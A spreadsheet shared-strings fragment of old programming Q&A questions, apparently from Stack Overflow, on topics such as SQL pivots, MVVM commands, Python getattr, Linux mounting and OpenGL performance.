&lt;li&gt;Have a generic configuration class that is passed to each module, like above. But instead of having properties, the modules access their settings by name (in the easiest case this could be a TCustomIniFile). This avoids having settings for all modules available in all applications, but introduces possible type compatibility problems and again, name clashes may become an issue (unless each module prefixes its options with its name, but then they can no longer share options).&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I guess everybody who wrote a modularized system has faced this issue and found some solutions they later on were stuck with, whether they still liked them or not. I have been there too, several times and am still looking for the golden bullet.&lt;/p&gt;
&lt;p&gt;Maybe somebody else has already found the ideal solution?&lt;/p&gt;
&lt;p&gt;(This is Delphi 2007 in case it matters. I am already using the JCL / JVCL.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to hilight a section of a TableView cell as part of the filtering process?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The backstory: I am applying a filter to a TableView. It's a simple 'find the rows with this string' filter.&lt;/p&gt;
&lt;p&gt;The requirement: I wish to hilight instances of the search term where they occur. &lt;/p&gt;
&lt;p&gt;Thus far I can see no means of doing this. ITableColorProvider let's me apply colours to entire cells, but not to a fraction of it.&lt;/p&gt;
&lt;p&gt;Clues most welcome.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Video shooting in iPhone</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to capture video from iPhone?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# - Calling methods from inside class</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do you call a client codes methods from inside a class defined in the client code?&lt;/p&gt;
&lt;p&gt;For example, I have a memory reading class, that can read values from the memory of a process at a certain address. I also have classes for managing the type of data that is read from memory (I am reading about an in-game 'object'. In the 'client code' I am calculating the 'base address' of that object in memory, then initializing my 'object class' using a constructor that takes the 'base address' as a parameter. This base class should then be able to tell me things about that object through methods because the objects know how far away from the base address a certain value is, such as 'health')&lt;/p&gt;
&lt;p&gt;I tried using code such as this, and it gave me an error. 'ObjectManager' is the class which can read values from memory.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class ObjectManager : Memory
{
    LocalCharacter LocalPlayer = new LocalCharacter(this);
    // other things omitted
}
// Error: Keyword 'this' is not available in the current context
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and this, out of desperation:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class ObjectManager : Memory
{
    LocalCharacter LocalPlayer = new LocalCharacter(ObjectManager);
    // other things omitted
}
// Error: Keyword 'this' is not available in the current context
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But to no avail. What is the best way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Group Box in WinForms</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a question about design winforms.&lt;/p&gt;
&lt;p&gt;Should I use, or not, group boxes in my forms? Is it good to the user? Give me some advantages, or disadvantages?&lt;/p&gt;
&lt;p&gt;Some people think thar it's not goog enough to use.&lt;/p&gt;
&lt;p&gt;What do you think about it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Canon Remote SDK Alternative?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there any Solution from another vendor? (With another Camera?)
Canon does not want to support the SDK anylonger.&lt;/p&gt;
&lt;p&gt;The Solution shoul contain live preview, zooming and configurable Flash. A c# interface would be fine. &lt;/p&gt;
&lt;p&gt;I know, the WIA interface but it isnt powerful enough.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I tell when another process has stopped writing to a file in Perl?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a system which is writing files to a folder using FTP.  I need to copy those files, but only when they FTP system has finished.  How do I tell when the first process has finished writing.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Implementing and using the ICommand interface, MVVM</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Although I deeply fell in love with the MVVM pattern there seem to be a lot of problems I cannot (yet) figure out for myself.&lt;/p&gt;
&lt;p&gt;I wonder what the parameters of the methods of the IComamnd interface are good for&lt;/p&gt;
&lt;p&gt;e.g. &lt;code&gt;void Execute(object parameter);&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I tie my view to the view model like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Button Command="{Binding SomeCommand}" ... /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and so "&lt;code&gt;parameter&lt;/code&gt;" will always be null.&lt;/p&gt;
&lt;p&gt;Any hints are welcome.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt;
Darn, one minute after I posted this question I found the answer on &lt;a href="http://stackoverflow.com/questions/335849/wpf-commandparameter-is-null-first-time-canexecute-is-called"&gt;Stackoverflow&lt;/a&gt;. Obviously controls do have a CommandParameter property.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is this query returning unwanted results?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Good morning,&lt;/p&gt;
&lt;p&gt;I have a problem with this query:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT  
    P.txt_nome AS Pergunta,   
    IP.nome AS Resposta,   
    COUNT(*) AS Qtd   
FROM  
    tb_resposta_formulario RF   
    INNER JOIN formularios F ON  
        F.id_formulario = RF.id_formulario   
    INNER JOIN tb_pergunta P ON  
        P.id_pergunta = RF.id_pergunta   
    INNER JOIN tb_resposta_formulario_combo RFC ON  
        RFC.id_resposta_formulario = RF.id_resposta_formulario   
    INNER JOIN itens_perguntas IP ON  
        IP.id_item_pergunta = RFC.id_item_pergunta   
WHERE  
    RF.id_formulario = 2   
GROUP BY    
    P.txt_nome,   
    IP.nome
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is the actual result of this query:&lt;/p&gt;
&lt;p&gt;|Pergunta| Resposta |Qtd|&lt;br /&gt;
|Produto |Combo 1MB | 3 |&lt;br /&gt;
|Produto |Combo 2MB | 5 |&lt;br /&gt;
|Produto |Combo 4MB | 1 |&lt;br /&gt;
|Produto |Combo 6MB | 1 |&lt;br /&gt;
|Produto |Combo 8MB | 4 |&lt;br /&gt;
|RegiÃ£o  |MG        | 3 |&lt;br /&gt;
|RegiÃ£o  |PR        | 2 |&lt;br /&gt;
|RegiÃ£o  |RJ        | 3 |&lt;br /&gt;
|RegiÃ£o  |SC        | 1 |&lt;br /&gt;
|RegiÃ£o  |SP        | 5 |  &lt;/p&gt;
&lt;p&gt;These are the results I was expecting:&lt;/p&gt;
&lt;p&gt;|Produto   | RegiÃ£o  |Qtd|&lt;br /&gt;
|Combo 1MB | MG      | 3 |&lt;br /&gt;
|Combo 2MB | SP      | 5 |&lt;br /&gt;
|Combo 4MB | SC      | 1 |&lt;br /&gt;
|Combo 6MB | RJ      | 1 |&lt;br /&gt;
|Combo 8MB | PR      | 2 |      &lt;/p&gt;
&lt;p&gt;I am using the PIVOT and UNPIVOT operators but the result is not satisfactory.&lt;/p&gt;
&lt;p&gt;Has anyone already faced this situation before? Do you have any insight you can offer?&lt;/p&gt;
&lt;p&gt;I already analyzed these links:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/213702/sql-server-2005-pivot-on-unknown-number-of-columns"&gt;http://stackoverflow.com/questions/213702/sql-server-2005-pivot-on-unknown-number-of-columns&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/152770/transpose-a-set-of-rows-as-columns-in-sql-server-2000"&gt;http://stackoverflow.com/questions/152770/transpose-a-set-of-rows-as-columns-in-sql-server-2000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/428041/sql-server-2005-turn-columns-into-rows"&gt;http://stackoverflow.com/questions/428041/sql-server-2005-turn-columns-into-rows&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/159456/pivot-table-and-concatenate-columns-sql-problem#159803"&gt;http://stackoverflow.com/questions/159456/pivot-table-and-concatenate-columns-sql-problem#159803&lt;/a&gt; &lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/198716/pivot-in-sql-2005#199763"&gt;http://stackoverflow.com/questions/198716/pivot-in-sql-2005#199763&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Att,
Pelegrini&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Easiest way to derive subset array of highest 10 values?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In javascript I have an array as follows: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var foo = [2, 2, 4, 4, 128, 2, 2, 1, 4, 18, 27, 16, 2, 1, 18, 21, 5, 1, 128, 1, 2, 2, 1, 18, 12, 60, 2, 28, 1, 17, 2, 3, 4, 2, 2, 2, 1, 27, 2, 17, 7, 2, 2, 2, 5, 1, 2, 4, 7, 1, 2, 1, 1, 1, 2, 1, 5, 7, 2, 7, 6, 1, 7, 1, 5, 8, 4];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And I am interested in finding a way (within one loop, not multiple) to derive a subset array of the highest 10 values, where the previous position of the value is the 'key' (so simulating a Map object): &lt;/p&gt;
&lt;p&gt;eg:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var fooTopTen = [[4, 128], [18, 128], [25, 60], [27, 28], [10, 27], [37, 27], [15, 21], [9, 18], [14, 18], [23, 18]];
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to mount from command line like the Nautilus does?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;On my Ubuntu linux box I can easily mount USB connected drives or CDROM clicking on devices icons that I can found on the Desktop.&lt;/p&gt;
&lt;p&gt;For example if I click on a USB connected drive icon the following things happen:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;a /media/LABEL directory is automatically created (where LABEL is the label of the disk and may vary from disk to disk)&lt;/li&gt;
&lt;li&gt;the filesystem on the device is mounted on /media/LABEL&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This process is significantly different from mounting using the &lt;code&gt;mount&lt;/code&gt; command. In particular: &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;you don't need to be root (or you don't need to modify /etc/fstab to allow ordinary user to mount the device)&lt;/li&gt;
&lt;li&gt;the /media/LABEL directory is automatically created&lt;/li&gt;
&lt;li&gt;the name of the directory changes according the volume label.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a command line command that behaves like the Gnome GUI mounting facilities does?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>YUV/PCM Visualizer to measure Lip Sync</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a two dump files of raw video and raw audio from an encoder and I want to be able to measure the "Lip-sync". Imagine a video of a hammer striking an anvil. I want to go frame by frame and see that when the hammer finally hits the anvil, there is a spike in amplitude on the audio track.&lt;/p&gt;
&lt;p&gt;Because of the speed that everything happens at, I cannot merely listen to the audio, i need to see the waveform in time domain.&lt;/p&gt;
&lt;p&gt;Are there any tools out there that will let me see both the video and audio?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When should I opt for IsolatedStorage versus AppData file storage?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've recently discovered the &lt;code&gt;IsolatedStorage&lt;/code&gt; facilities in .net, and I'm wondering when I should use them for my application data versus when I should use (e.g.) &lt;code&gt;Application.LocalUserAppDataPath&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;One thing that I've noticed is that &lt;code&gt;Application&lt;/code&gt; doesn't exist outside of a winforms app, so it seems that &lt;code&gt;IsolatedStorage&lt;/code&gt; might make sense for a class library that needs some specific storage, especially if that library might be used by both a web app and a winforms app.  Is that the only distinguishing point, or is there more to it?&lt;/p&gt;
&lt;p&gt;(As a rule, up 'til now, I've made the app provide a file stream to the library when the library might need some sort of external storage--- in general, I don't like the idea of a library having some sort of state external to the caller's context.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to calculate permutations in linear time, with a twist</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a resource scheduling issue in Java where things need to be sequenced, but there are restrictions on what resources can be next to each other.  A good analogy is a string of "digits", where only certain digits can be next to each other.  My solution was recursive, and works fine for small strings, but run time is O(X^N), where X is the number of possible digits (the base), and N is the length of the string.  It quickly becomes unmanageable.&lt;/p&gt;
&lt;p&gt;Using the compatibility matrix below, here are a few examples of allowed strings&lt;br&gt;
Length of 1:  0, 1, 2, 3, 4&lt;br&gt;
Length of 2:  02, 03, 14, 20, 30, 41&lt;br&gt;
Length of 3:  020, 030, 141, 202, 203, 302, 303, 414&lt;br&gt;&lt;/p&gt;
&lt;pre&gt;
     0  1  2  3  4
   ---------------------
0|  0  0  1  1  0
1|  0  0  0  0  1
2|  1  0  0  0  0
3|  1  0  0  0  0
4|  0  1  0  0  0
&lt;/pre&gt;
&lt;p&gt;My solution for counting all strings of length N was start with an empty string, permute the first digit, and make a recursive call for all strings of length N-1.  The recursive calls check the last digit that was added and try all permutations that can be next to that digit.  There are some optimizations made so that I don't try and permute 00, 01, 04 every time, for example - only 02, 03, but performance is still poor as it scales from base 5 (the example) to base 4000.&lt;/p&gt;
&lt;p&gt;Any thoughts on a better way to count the permutations other than trying to enumerate all of them?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Examples of using F# to query Entity Framework</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking all over Google to find an example or tutorial about using F# to query an Entity data source.&lt;/p&gt;
&lt;p&gt;Honestly I haven't found much. Have any of you had any luck ? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Oracle9i: Filter Expression Fails to Exclude Data at Runtime</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a relatively simple select statement in a VB6 program that I have to maintain. (Suppress your natural tendency to shudder; I inherited the thing, I didn't write it.)&lt;/p&gt;
&lt;p&gt;The statement is straightforward (reformatted for clarity):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select distinct 
   b.ip_address 
from 
   code_table a, 
   location b 
where 
   a.code_item = b.which_id and 
   a.location_type_code = '15' and 
   a.code_status = 'R'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The table in question returns a list of IP addresses from the database. The key column in question is &lt;code&gt;code_status&lt;/code&gt;. Some time ago, we realized that one of the IP addresses was no longer valid, so we changed its status to &lt;code&gt;I&lt;/code&gt; (invalid) to exclude it from appearing in the query's results.&lt;/p&gt;
&lt;p&gt;When you execute the query above in SQL Plus, or in SQL Developer, everything is fine. But when you execute it from VB6, the check against &lt;code&gt;code_status&lt;/code&gt; is ignored, and the invalid IP address appears in the result set.&lt;/p&gt;
&lt;p&gt;My first guess was that the results were cached somewhere. But, not being an Oracle expert, I have no idea where to look. &lt;/p&gt;
&lt;p&gt;This is &lt;em&gt;ancient&lt;/em&gt; VB6 code. The SQL is embedded in the application. At the moment, I don't have time to rewrite it as a stored procedure. (I will some day, given the chance.) But, I need to know what would cause this disparity in behavior and how to eliminate it. If it's happening here, it's likely happening somewhere else.&lt;/p&gt;
&lt;p&gt;If anyone can suggest a good place to look, I'd be very appreciative.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>getting a property of a java bean of unknown class</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to be able to call "getProgram" on objects which have that method, without knowing which class they belong to. I know I should use an interface here, but I'm working with someone else's code and can't redesign the classes I'm working with. I thought BeanUtils.getProperty might help me, but it seems it only returns strings. Is there something like Beanutils.getProperty that will return a cast-able object? Or another, smarter way to work with two similar classes that don't share an interface?
thanks,
-Morgan&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Swapping two rows in MS SQLServer retaining the original primary key and without manual update</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following problem : I have rows like &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ID   CODE     NAME            .........
1    h1100h1  Cool example1   .........
2    h654441  Another cool1   .........
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like to swap them retaining all old primary keys and constraints. Of course, I can easily solve this manually by updating the rows. I am kind of wondering whether anybody has any excellent solution for this kind of problem instead of just executing update command manually. I really really appreciate any suggestions or recommendations.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is System.Object not abstract in .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know it is commonly used as a lock object, but is that really sufficient reason?
What is the meaning of&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;object o = new object();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;An non-abstract class is something that represents actual objects. "asdasdf" is a string. What actual instance can there be of "object" class? It doesn't make sense, OOP-wise. My question is if there is some practical reason for its existence (besides being used as a lock object).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible to achieve the "Aero Glass" look on XP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know any kind of framework that enables (not exactly the same, but) Vista's Aero Glass on XP?&lt;/p&gt;
&lt;p&gt;I need to develop a little desktop application with WPF, which has a Vista-like UI on XP. I don't need exactly the Aero Glass, some UI like "Windows Live Messenger" will do the thing.
Is there any way to make it a reality?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>getting the list of all functions executed like call stack in asp.net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am having trouble with debugging one of the problems that I am having in our website. This is the problem. I have a webpage that contains the photo of an employee and information related to the employee. When the user logins to our website, we are storing the details of the employee in session. I am setting the image url for the photo of an employee as follows.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;imgEEPhoto.ImageUrl = imgPhoto.aspx?Company=XXXX&amp;amp;Empno=YYYY. 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Inside the page imgPhoto.aspx, I am checking if the session is alive for that user. when I login to the page that has the employee photo sometimes the photo is not displayed. It is because I am checking whether the session is alive inside the imgPhoto.aspx page. sometimes the session is alive and sometimes the session is not alive. It looks like there is some function that is setting the session to null asynchronously. I am not knowing how to track that function. so I am thinking that inside the imgPhoto.aspx page, if I can get the list of all functions that have been executed so far, I could track the function that is resetting the session. Is there a way to find this? &lt;/p&gt;
&lt;p&gt;If there is no another way to debug this problem, please let me know.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The page imgPhoto.aspx gets company and empno as query string parameters. Then the page gets the binary data based on company and empno and uses Response.BinaryWrite() to display photo. The session check is at the beginning of this function. so somewhere before this function is called and after the end of all the functions in mainpage the session is getting timedout. Actually I am not sure if it is getting timedout because I can print the sessionid. But I cannot access variables stored in session.&lt;/p&gt;
&lt;p&gt;If I print the callstack inside the function, it is giving the list of functions that are executed inside that page. It is not giving all the functions that are executed before that function.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>calling methods on an instance with getattr [ python ]</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was trying to write some code that would check if an item has some attributes , and to call them . I tried to do that with getattr , but the modifications wouldn't be permanent . I made a "dummy" class to check upon this .
Here is the code I used for the class :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;
class X:                                         
   def __init__(self):
     self.value = 90  
   def __get(self):   
     return self.value
   def __set(self,value):
     self.value = value  
   value = property(__get,__set)
x = X()
print x.value # this would output 90
getattr(x,"value=",99) # when called from an interactive python interpreter this would output 99
print x.value # this is still 90 ( how could I make this be 99 ? ) 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks !&lt;/p&gt;
</t>
  </si>
  <si>
    <t>how to select only the background in jQuery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to add two events to my items.&lt;/p&gt;
&lt;p&gt;One for the "background" of the document: &lt;code&gt;$(document).click(function() {do()});&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;One for the divs in the document: &lt;code&gt;$("div").click(function() {do2()});&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The problem is that when I click on a &lt;code&gt;div&lt;/code&gt;, both functions, &lt;code&gt;do&lt;/code&gt; and &lt;code&gt;do2&lt;/code&gt; are called.&lt;/p&gt;
&lt;p&gt;How can I thus tell to call &lt;code&gt;do()&lt;/code&gt; only when I click on no element?&lt;/p&gt;
&lt;p&gt;Thanks for your help,&lt;/p&gt;
&lt;p&gt;J.&lt;/p&gt;
&lt;hr&gt;
</t>
  </si>
  <si>
    <t>Linux Socket Buffer Imbalance</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a simple scenario, where two servers are connected through a gigabit link.
I run iperf on both sides to measure the throughput.&lt;/p&gt;
&lt;p&gt;What surprises me, whenever I run the traffic bidirectionally, it always favor one side only (eg. ~900Mbps vs. ~100Mbps). If I run the traffic unidirectional, each side got ~900Mbps.&lt;/p&gt;
&lt;p&gt;If I connect one of the server (the lower memory) to another server, the bidirectional traffic was balanced out. So definitely not the iperf problem.&lt;/p&gt;
&lt;p&gt;Other facts:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;One server has pretty big memory (~12GB), while the other only has ~4GB.&lt;/li&gt;
&lt;li&gt;Both server have the same TCP memory configurations, in this case, the same TCP w/r mem, core w/r mem, TX queue length.&lt;/li&gt;
&lt;li&gt;Both are using the same ethernet card (E1000 driver).&lt;/li&gt;
&lt;li&gt;Same Linux version, RedHat 2.6.9. The big server runs 64-bit version, due to the 12GB memory.&lt;/li&gt;
&lt;li&gt;Both have no other traffic, beside small SSH, and occasional ping every second.&lt;/li&gt;
&lt;li&gt;Both have "tcp_moderate_rcvbuf" on.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Questions:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Why the imbalanced?&lt;/li&gt;
&lt;li&gt;Which area should I look to see if the socket buffer is heavily utilized on one side, and how?&lt;/li&gt;
&lt;li&gt;Beside iperf, what are other good software (not hardware/tester) to measure the performance?&lt;/li&gt;
&lt;li&gt;What's the best way to get an insight on how Linux allocating the buffer, from the Ethernet ring buffer, TCP buffer, socket buffer, and other buffers?&lt;/li&gt;
&lt;li&gt;What could be the other entity that might impact the throughput that I haven't covered above?&lt;/li&gt;
&lt;li&gt;Is there any documentation that explains how Linux distributes the memory allocation between user, kernel, device drivers, and network stack?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Any advise is deeply appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>UpdatePanelAnimationExtender: No animation when certain button clicked</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a GridView inside an UpdatePanel that is populated when a search is performed on the page. When it is populated or the page changed, it performs a fade animation. There are other operations that I want to perform that update the UpdatePanel, but I don't want these to perform these fade animations. The closest I have found on the ASP forums is: &lt;a href="http://forums.asp.net/p/1037038/1487096.aspx" rel="nofollow"&gt;http://forums.asp.net/p/1037038/1487096.aspx&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The problem with the solution proposed in that thread is that there is no way to catch the Updated and Updating events to animate. Any ideas?&lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;Nick&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Facebook authorization problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a facebook app and there's something I'm just not understanding about how their authorization system works.&lt;/p&gt;
&lt;p&gt;Our basic setup is this&lt;/p&gt;
&lt;p&gt;canvas URL = domain.com/facebook&lt;/p&gt;
&lt;p&gt;This is a simple page with an FBML Iframe element that points to domain.com/facebook/app which is an HTML page that serves up a Flash Application. &lt;/p&gt;
&lt;p&gt;The Flash Application requests additional data from our application server - some of those requests ask for facebook data (such as a list of friend IDs).&lt;/p&gt;
&lt;p&gt;So Flash then makes a request to domain.com/resources/facebook/friends - this is a PHP page which creates a Facebook instance (their PHP library) and performs the necessary call to their API and returns the data.&lt;/p&gt;
&lt;p&gt;However, the request to this URL (by flash) doesn't validate, so it is then redirected to their login when then itself redirects back my canvas URL with two parameters - &lt;strong&gt;auth_token&lt;/strong&gt; and &lt;strong&gt;next&lt;/strong&gt;.  So the request is valid, but the redirect breaks the flash call.&lt;/p&gt;
&lt;p&gt;So, I'm trying to figure out how to make these other API calls (when themselves mace facebook API calls) be facebook-vaildated from the get-go.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Editing shortcut (.lnk) properties with Powershell</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've found a nasty VBS way to do this, but I'm looking for a native PoSh procedure to edit the properties of a .LNK file.  The goal is to reach out to remote machines, duplicate an existing shortcut with most of the correct properties, and edit a couple of them.&lt;/p&gt;
&lt;p&gt;If it would just be easier to write a new shortcut file, that would work too.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Discrimanant taskkill.exe for excel.exe</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have to run Excel on a server and to kill the excel.exe process I am using taskkill.exe:&lt;/p&gt;
&lt;p&gt;System.Diagnostics.Process.Start("taskkill.exe", "-im excel.exe /f");&lt;/p&gt;
&lt;p&gt;My only problem is that if there is someone who is also using the server who is working on excel (It could happen) then their processes will be killed also.  Is there anyway around this to only kill the excel files created by my code?  Any help would be great. Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>OpenGL performance difference on Linux and WindowsXP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've noticed that a OpenGL app I've been working on has significant performance difference when run on Linux vs WindowsXP. &lt;/p&gt;
&lt;p&gt;Granted, there are a lot of textures and shadow buffers but I would estimate that the app runs about 10x &lt;strong&gt;slower&lt;/strong&gt; on Windows XP. &lt;/p&gt;
&lt;p&gt;Any ideas? &lt;/p&gt;
&lt;p&gt;Any suggestions for porting the code to DirectX? Can that be done easily or would a re-write be needed? &lt;/p&gt;
&lt;p&gt;Running of different hardware. I don't have the specs of the Linux box, but my xp box is Intel Duo Core 2 with Nvidia Quadro FX 1500. The linux box video card was some sort of Nvidia Geforece (It was a University computer).&lt;/p&gt;
&lt;p&gt;Some initiation code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;FlyWindow::FlyWindow() :
GlowWindow("fly", 300, 100, // GlowWindow::autoPosition, GlowWindow::autoPosition,
       700, 500,
       Glow::rgbBuffer | Glow::doubleBuffer |
       Glow::depthBuffer | Glow::multisampleBuffer,
       Glow::keyboardEvents | Glow::mouseEvents | Glow::dragEvents |
       /*Glow::menuEvents | */ Glow::motionEvents | Glow::visibilityEvents |
       Glow::focusEvents /* set ::glutEntryFunc */ ),
W(700), H(500),
flock(10),
lastSeconds(myclock.getSecondsSinceStart())
{
    myfps = FPScounter();
    GLdraw&amp;lt;float&amp;gt;::initGL(W,H);
    // Add a bouncing checkerboard
    MovingCB = Point3d&amp;lt;double&amp;gt;(50, 2, 50);
    Glow::RegisterIdle(this);
    bDebug = false;
    m_bLookAtCentroid = true;
    m_bLookAtGoal = false;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What language has the easiest and most robust date parsing?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know java has the SimpleDateFormat which seems fairly powerful, but you need to know the format ahead of time to use it correctly.&lt;br /&gt;
TCL's clock scan function seems to be the easiest and most powerful I've seen.&lt;/p&gt;
&lt;p&gt;e.g. clock scan "1/08/2009 12:33:01 AM" will work just as well as&lt;br /&gt;
     clock scan "8-Jan-2009 12:33:01"&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; Okay, removing the idea that it has to be a built-in feature. Are Perl and Python the best available?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Converting serial port data to TCP/IP in a linux environment</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to get data from the serial port of a Linux system and convert it to TCP/IP to send to a server. Is this difficult to do? I have some basic programming experience but not much experience with Linux. Are there any open source applications that do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Restoring MySQL database from physical files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it possible to restore a MySQL database from the physical database files. I have a directory that has the following file types:&lt;/p&gt;
&lt;p&gt;client.frm&lt;br /&gt;
client.MYD&lt;br /&gt;
client.MYI  &lt;/p&gt;
&lt;p&gt;but for about 20 more tables.&lt;/p&gt;
&lt;p&gt;I usually use mysqldump or a similar tool to get everything in 1 SQL file so what is the way to deal with these types of files?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Studio: How to figure out where this type is defined?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i have an interface - one of whose members returns a variable of type**Object**.&lt;/p&gt;
&lt;p&gt;In my attempts to try to use this returned variable, i discovered that it isn't just an "&lt;strong&gt;Object&lt;/strong&gt;", but is actually a "&lt;strong&gt;mshtml.HTMLDocumentClass&lt;/strong&gt;", as you can see in the following screenshot:&lt;/p&gt;
&lt;p&gt;&lt;img src="http://i43.tinypic.com/svmfbn.jpg" alt="alt text" /&gt;&lt;/p&gt;
&lt;p&gt;In my case, this is perfect, since it appears (through code-insight), that the object then supports many of the methods and properties i'm actually trying to use (that i was about to use through late binding).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The question is:&lt;/strong&gt; &lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Where is this type coming from? &lt;/li&gt;
&lt;li&gt;Where is it defined&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;so i may convert my code from:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;object webDocument = ie.Document;
